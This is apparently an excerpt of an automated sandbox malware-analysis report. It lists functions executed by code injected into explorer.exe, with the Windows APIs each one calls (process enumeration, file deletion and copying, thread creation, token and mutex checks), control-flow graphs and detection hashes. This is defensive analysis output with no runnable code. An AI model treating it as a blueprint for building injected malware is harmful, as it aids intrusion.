2586->2584 2595 29928d0 2586->2595 2588 29923ef 2588->2581 2589 29949b0 3 API calls 2588->2589 2590 2992624 2588->2590 2589->2590 2590->2569 2590->2570 2592 2993e9f 2591->2592 2601 299400c 2592->2601 2594 2993fbf 2594->2588 2596 2992cf3 2595->2596 2597 29928d9 2595->2597 2596->2586 2598 299400c RtlReAllocateHeap 2597->2598 2599 29929d8 2597->2599 2598->2599 2599->2596 2600 2993e70 RtlReAllocateHeap 2599->2600 2600->2596 2603 2994056 2601->2603 2604 299404f 2601->2604 2602 299433f RtlReAllocateHeap 2602->2603 2603->2602 2603->2604 2604->2594

                                                                                                                    Executed Functions

                                                                                                                    Function 02993678 Relevance: 1.9, APIs: 1, Instructions: 404comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInstance
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 542301482-0
                                                                                                                    • Opcode ID: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                    • Instruction ID: 2c546d8ae9526978a185af421171d218c8b40e700f390bd9745acf46c1c879d4
                                                                                                                    • Opcode Fuzzy Hash: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                    • Instruction Fuzzy Hash: 07E1E734608A488FCF94EF28C895EA9B7F5FFA9304F114699E44ACB265DB70E944CB41
                                                                                                                    Function 02993520 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserNameW.ADVAPI32 ref: 02993574
                                                                                                                      • Part of subcall function 02993678: CoCreateInstance.COMBASE ref: 029936C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInstanceNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3213660374-0
                                                                                                                    • Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                    • Instruction ID: 8f916ed3562d96b1b0af78c0e8a2525cd6ceb62f9bfe65420aba460d0bc3def0
                                                                                                                    • Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                    • Instruction Fuzzy Hash: 34110A70718B4C8FCF90EF6C901876EB6D2EBDC320F950A6EA84EC3255DA7489458B81
                                                                                                                    Function 02991A60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 299threadmemoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CloseHandleThread$Heap
                                                                                                                    • String ID: iP+
                                                                                                                    • API String ID: 1490796931-51890417
                                                                                                                    • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                    • Instruction ID: ab01b1a4762de24e4e1ecc7dd0720205e0d18f4480877edad0775f257b958bbb
                                                                                                                    • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                    • Instruction Fuzzy Hash: 4A91A230618E0A8FDF54EF2CD8916A573D6FF98311B44017E9C4ECB156EB34D9418B96
                                                                                                                    Function 0858239C Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 506filethreadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 162 858239c-85823f9 call 8583e70 165 85823ff-8582404 162->165 166 85828a7 162->166 165->166 167 858240a-858240d 165->167 168 85828ad-85828c7 166->168 167->166 169 8582413-858241e 167->169 170 8582424-8582457 call 8585058 169->170 171 8582897-85828a5 call 85853d8 169->171 170->171 177 858245d-8582482 call 8584fac call 858516c 170->177 171->166 171->168 182 85824ad 177->182 183 8582484-858249e 177->183 184 85824b2-85824cb call 858516c 182->184 183->182 187 85824a0-85824ab 183->187 189 858263a-8582642 184->189 190 85824d1-85824e4 184->190 187->184 193 8582648-858264c 189->193 194 858282d-858285a call 8583e70 189->194 191 8582536-8582538 190->191 192 85824e6-858252d 190->192 191->189 198 858253e-85825b0 call 85853f8 191->198 192->191 196 8582652-858265a 193->196 197 85826f4-8582784 call 8584730 DeleteFileW * 2 call 85834d4 call 8583e70 call 85853d8 SleepEx RtlExitUserThread 193->197 207 858285c-8582863 194->207 208 858288f-8582895 194->208 202 8582789-85827b6 call 8583e70 196->202 203 8582660-858266d 196->203 197->171 241 858262f-8582635 call 85853d8 198->241 242 85825b2-858262a call 8584fac call 8585058 call 85849b0 call 858535c 198->242 202->208 216 85827bc-85827c3 202->216 203->208 218 8582673-8582676 203->218 207->208 212 8582865-8582868 207->212 208->171 212->208 217 858286a-858288a call 85828d0 call 85853d8 212->217 216->208 221 85827c9-85827cc 216->221 217->208 218->208 224 858267c-8582680 218->224 221->208 229 85827d2-858282b call 85828d0 call 8584730 call 85853d8 221->229 225 8582682-85826af call 8583e70 224->225 226 85826e7-85826ee 224->226 239 85826e1-85826e5 225->239 240 85826b1-85826b8 225->240 226->197 226->208 229->208 239->225 239->226 240->239 244 85826ba-85826bd 240->244 241->189 242->241 244->239 250 85826bf-85826dc call 85828d0 call 85853d8 244->250 250->239
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$ExitSleepThreadUser
                                                                                                                    • String ID: |:|
                                                                                                                    • API String ID: 2796381497-3736120136
                                                                                                                    • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                    • Instruction ID: 9d529b197564fc65beabca8b4ae8e162bab05668f4080655d57a412ecd31d5a8
                                                                                                                    • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                    • Instruction Fuzzy Hash: 5CE1A230718F49CBDB19BB6884597BA76D1FB98312F10062FD49FD3280DF74A9428B86
                                                                                                                    Function 0299239C Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 506filethreadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 57 299239c-29923f9 call 2993e70 60 29923ff-2992404 57->60 61 29928a7 57->61 60->61 62 299240a-299240d 60->62 63 29928ad-29928c7 61->63 62->61 64 2992413-299241e 62->64 65 2992424-2992457 call 2995058 64->65 66 2992897-29928a5 call 29953d8 64->66 65->66 72 299245d-2992482 call 2994fac call 299516c 65->72 66->61 66->63 77 29924ad 72->77 78 2992484-299249e 72->78 79 29924b2-29924cb call 299516c 77->79 78->77 82 29924a0-29924ab 78->82 84 299263a-2992642 79->84 85 29924d1-29924e4 79->85 82->79 86 2992648-299264c 84->86 87 299282d-299285a call 2993e70 84->87 88 2992536-2992538 85->88 89 29924e6-299252d 85->89 91 2992652-299265a 86->91 92 29926f4-2992784 call 2994730 DeleteFileW * 2 call 29934d4 call 2993e70 call 29953d8 SleepEx RtlExitUserThread 86->92 101 299285c-2992863 87->101 102 299288f-2992895 87->102 88->84 93 299253e-29925b0 call 29953f8 88->93 89->88 96 2992789-29927b6 call 2993e70 91->96 97 2992660-299266d 91->97 92->66 134 299262f-2992635 call 29953d8 93->134 135 29925b2-299262a call 2994fac call 2995058 call 29949b0 call 299535c 93->135 96->102 110 29927bc-29927c3 96->110 97->102 112 2992673-2992676 97->112 101->102 107 2992865-2992868 101->107 102->66 107->102 111 299286a-299288a call 29928d0 call 29953d8 107->111 110->102 115 29927c9-29927cc 110->115 111->102 112->102 118 299267c-2992680 112->118 115->102 120 29927d2-299282b call 29928d0 call 2994730 call 29953d8 115->120 122 2992682-29926af call 2993e70 118->122 123 29926e7-29926ee 118->123 120->102 137 29926e1-29926e5 122->137 138 29926b1-29926b8 122->138 123->92 123->102 134->84 135->134 137->122 137->123 138->137 142 29926ba-29926bd 138->142 142->137 146 29926bf-29926dc call 29928d0 call 29953d8 142->146 146->137
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$ExitSleepThreadUser
                                                                                                                    • String ID: |:|
                                                                                                                    • API String ID: 2796381497-3736120136
                                                                                                                    • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                    • Instruction ID: 459191823c6eb2359c2f158bc68bf55ee4d6d82bf64cb84f6d75c60703c5ff21
                                                                                                                    • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                    • Instruction Fuzzy Hash: BAE1A830718F488BDB19AB6C84597BA77D6FB98325F50062ED89FC3240DF74E9428786
                                                                                                                    Function 02991F94 Relevance: 7.7, APIs: 5, Instructions: 172fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32 ref: 0299201E
                                                                                                                    • CopyFileW.KERNEL32 ref: 0299202D
                                                                                                                    • DeleteFileW.KERNEL32 ref: 0299203E
                                                                                                                    • DeleteFileW.KERNEL32 ref: 02992089
                                                                                                                      • Part of subcall function 029949B0: SetFileAttributesW.KERNEL32 ref: 029949FF
                                                                                                                      • Part of subcall function 029949B0: CreateFileW.KERNEL32 ref: 02994A29
                                                                                                                      • Part of subcall function 029949B0: SetFileTime.KERNEL32 ref: 02994A54
                                                                                                                    • CreateFileW.KERNEL32 ref: 02992115
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$Create$AttributesCopyTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 642576546-0
                                                                                                                    • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                    • Instruction ID: c68c616ab317af92968f79b3b0c7a5cba74ab61473fd2ce442f231bba00a148a
                                                                                                                    • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                    • Instruction Fuzzy Hash: 4E414930718A4C4FDFA9AFAC945836E76D2EBCC320F54457EA80EC3285DE349D068B85
                                                                                                                    Function 02993C84 Relevance: 7.6, APIs: 5, Instructions: 72processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 306 2993c84-2993c9b 307 2993d3b-2993d54 306->307 308 2993ca1-2993cb3 CreateToolhelp32Snapshot 306->308 309 2993d23-2993d35 SleepEx 308->309 310 2993cb5-2993ccb Process32First 308->310 309->307 309->308 311 2993d16-2993d18 310->311 312 2993d1a-2993d1d CloseHandle 311->312 313 2993ccd-2993ce4 call 2995140 311->313 312->309 316 2993ce6-2993ce8 313->316 317 2993cea-2993cf8 316->317 318 2993cfc-2993d03 call 29947a4 316->318 317->316 319 2993cfa 317->319 321 2993d08-2993d10 Process32Next 318->321 319->321 321->311
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2482764027-0
                                                                                                                    • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                    • Instruction ID: 3ea950034da55c5ea781f07bc4357f306840e9bde7d599f9b92749dc35bbde7e
                                                                                                                    • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                    • Instruction Fuzzy Hash: 4521B730118A098FDF18EF6CC0987AA72E2FF88325F140ABAE84FDE155EB358545C715
                                                                                                                    Function 08581A60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299threadmemoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 322 8581a60-8581a95 323 8581a97-8581a9e 322->323 324 8581ab3-8581ab7 323->324 325 8581ab9-8581ac5 324->325 326 8581aa0-8581ab1 324->326 327 8581adc-8581ae1 325->327 328 8581ac7-8581acd 325->328 326->324 330 8581ae7-8581aee 327->330 329 8581acf-8581ada 328->329 328->330 329->330 331 8581af9-8581aff 330->331 332 8581af0-8581af7 330->332 331->323 333 8581b01-8581b0b 331->333 332->331 332->333 334 8581b1a-8581b32 call 8581d98 333->334 335 8581b0d-8581b14 333->335 336 8581d6f 334->336 340 8581b38-8581b5a call 8581d98 334->340 335->334 335->336 339 8581d71-8581d8f 336->339 340->336 343 8581b60-8581b8f RtlCreateHeap 340->343 344 8581b91-8581bab call 8584fac 343->344 344->336 348 8581bb1-8581bc9 call 858535c 344->348 348->344 351 8581bcb-8581be6 call 8581d98 348->351 351->336 354 8581bec-8581c0b call 8581d98 351->354 354->336 357 8581c11-8581c30 call 8581d98 354->357 357->336 360 8581c36-8581c55 call 8581d98 357->360 360->336 363 8581c5b-8581c7a call 8581d98 360->363 363->336 366 8581c80-8581c9f call 8581d98 363->366 366->336 369 8581ca5-8581d00 call 8584bac * 3 366->369 369->336 376 8581d02-8581d09 369->376 376->336 377 8581d0b-8581d0e 376->377 377->336 378 8581d10-8581d60 CreateThread * 2 377->378 380 8581d68-8581d6d 378->380 380->339
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$Thread$Heap
                                                                                                                    • String ID: iP+
                                                                                                                    • API String ID: 1054751041-51890417
                                                                                                                    • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                    • Instruction ID: 59dd8eba0a8a96ad0b4faa55182fdb2a44d8d4ffb935b636bfe2208e05cf1dfe
                                                                                                                    • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                    • Instruction Fuzzy Hash: E091C230618E09CFCF54FF28D891AA573D6FB98302F0441BE9C4EDB256EA34D5428B96
                                                                                                                    Function 029949B0 Relevance: 4.6, APIs: 3, Instructions: 84filetimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesCreateTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1986686026-0
                                                                                                                    • Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                                    • Instruction ID: 1d1bd6a820973ecfda9322e3c635c34c4c8f9000e4b91eeee50b4fe2f8990d89
                                                                                                                    • Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                                    • Instruction Fuzzy Hash: 3D212F3070CA488FDF64EF68988979EB6E2FBD8701F10456EA84EC7245DA34DA058782
                                                                                                                    Function 02994E90 Relevance: 3.1, APIs: 2, Instructions: 122registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 390 2994e90-2994ed9 call 2994fac 394 2994edf 390->394 395 2994f63-2994f92 call 299535c ObtainUserAgentString 390->395 397 2994ee1-2994f23 call 2994fac RegQueryValueExA 394->397 401 2994f93 call 299535c 397->401 402 2994f25-2994f44 call 299535c call 299516c 397->402 405 2994f98-2994f9d 401->405 402->405 411 2994f46-2994f57 402->411 407 2994f59-2994f5a 405->407 408 2994f9f 405->408 407->395 408->397 411->407
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExA.KERNEL32 ref: 02994F15
                                                                                                                    • ObtainUserAgentString.URLMON ref: 02994F7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AgentObtainQueryStringUserValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4107646653-0
                                                                                                                    • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                    • Instruction ID: fae0cd4fc871c46ad610fcf7cb8e665ea3131d80b91300a92c3664bcbe87132f
                                                                                                                    • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                    • Instruction Fuzzy Hash: 1F318431608A4D8FDF19EF6CD8896EA77D6FB98324B04427AE84EC3545EF70D8068791
                                                                                                                    Function 08581E1C Relevance: 3.1, APIs: 2, Instructions: 121synchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 08584D20: GetVolumeInformationA.KERNEL32 ref: 08584D8D
                                                                                                                    • CreateMutexExA.KERNEL32 ref: 08581E8F
                                                                                                                    • CreateFileMappingA.KERNEL32 ref: 08581F41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$FileInformationMappingMutexVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3260430491-0
                                                                                                                    • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                    • Instruction ID: 33c2998c103300dffa3cf3bd1557a2e1234bb84ef2dc45fe3bd9f2bff01a861d
                                                                                                                    • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                    • Instruction Fuzzy Hash: AF413D30714F09CFEB64FF3880587AA76D2FB98707F104A2E845EE6244DF7496069B85
                                                                                                                    Function 02991E1C Relevance: 3.1, APIs: 2, Instructions: 121synchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02994D20: GetVolumeInformationA.KERNEL32 ref: 02994D8D
                                                                                                                    • CreateMutexExA.KERNEL32 ref: 02991E8F
                                                                                                                    • CreateFileMappingA.KERNEL32 ref: 02991F41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$FileInformationMappingMutexVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3260430491-0
                                                                                                                    • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                    • Instruction ID: b4a21053f043027a211f57d5536fcee26d316f27ef11ba6cf67253956f903fb3
                                                                                                                    • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                    • Instruction Fuzzy Hash: 0A415F30714F0C8FDB65EB3880187AE76D2FB98726F504A3E905EC6184CF7496029B81
                                                                                                                    Function 08584AD0 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.KERNELBASE ref: 08584B24
                                                                                                                    • GetTokenInformation.KERNELBASE ref: 08584B5B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4114910276-0
                                                                                                                    • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                    • Instruction ID: 8bf392e97913917a24da158dfa70e584b2e304af3eea98838c95fc224281f669
                                                                                                                    • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                    • Instruction Fuzzy Hash: 06213E34608B098FC754FF28C49866AB7E1FBD9311B044A6EA49AD7364DE30D845DB82
                                                                                                                    Function 02994AD0 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.KERNELBASE ref: 02994B24
                                                                                                                    • GetTokenInformation.KERNELBASE ref: 02994B5B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4114910276-0
                                                                                                                    • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                    • Instruction ID: 61d484cae4bda54fe213f90ae095f7fcfc616a98ee0b260ff2e186b95d8fcefe
                                                                                                                    • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                    • Instruction Fuzzy Hash: 10213334608A088FCB55EB2CC45866AB7E2FBD9311B054A6EA49AC7254DB30D845DB42
                                                                                                                    Function 08583C84 Relevance: 3.1, APIs: 2, Instructions: 72processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 515 8583c84-8583c9b 516 8583d3b-8583d54 515->516 517 8583ca1-8583cb3 CreateToolhelp32Snapshot 515->517 518 8583d23-8583d35 SleepEx 517->518 519 8583cb5-8583ccb 517->519 518->516 518->517 521 8583d16-8583d18 519->521 522 8583d1a-8583d1b 521->522 523 8583ccd-8583ce4 call 8585140 521->523 522->518 526 8583ce6-8583ce8 523->526 527 8583cea-8583cf8 526->527 528 8583cfc-8583d03 call 85847a4 526->528 527->526 529 8583cfa 527->529 531 8583d08-8583d0e 528->531 529->531 531->521
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateSleepSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 684154974-0
                                                                                                                    • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                    • Instruction ID: 42e53e7daaf73dbce8ef9b2b9c6ad56129e1256e325a4509adf39e3d9e405e05
                                                                                                                    • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                    • Instruction Fuzzy Hash: 56219330218A09CFDB14FF64C0987EA76D2FF88356F140A7ED84BEA255DB7495458711
                                                                                                                    Function 08583D60 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 535 8583d60-8583d70 536 8583d72-8583d94 EnumWindows SleepEx 535->536 537 8583d96-8583da4 535->537 536->536 536->537
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumSleepWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 498413330-0
                                                                                                                    • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                    • Instruction ID: 6d855e1563995670fc1348433018a6d1e5401944f836b680748c42234916f2c6
                                                                                                                    • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                    • Instruction Fuzzy Hash: 00E04F30505A09CFEB28ABA4C0DCBF036A1FB18246F1401BFDC0EED295CB7A4945CB20
                                                                                                                    Function 02993D60 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 532 2993d60-2993d70 533 2993d72-2993d94 EnumWindows SleepEx 532->533 534 2993d96-2993da4 532->534 533->533 533->534
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumSleepWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 498413330-0
                                                                                                                    • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                    • Instruction ID: 8264e15d8b57d81164fd090b3a15cf603a1a21f7372fbd8d2b3e9906dc2c7998
                                                                                                                    • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
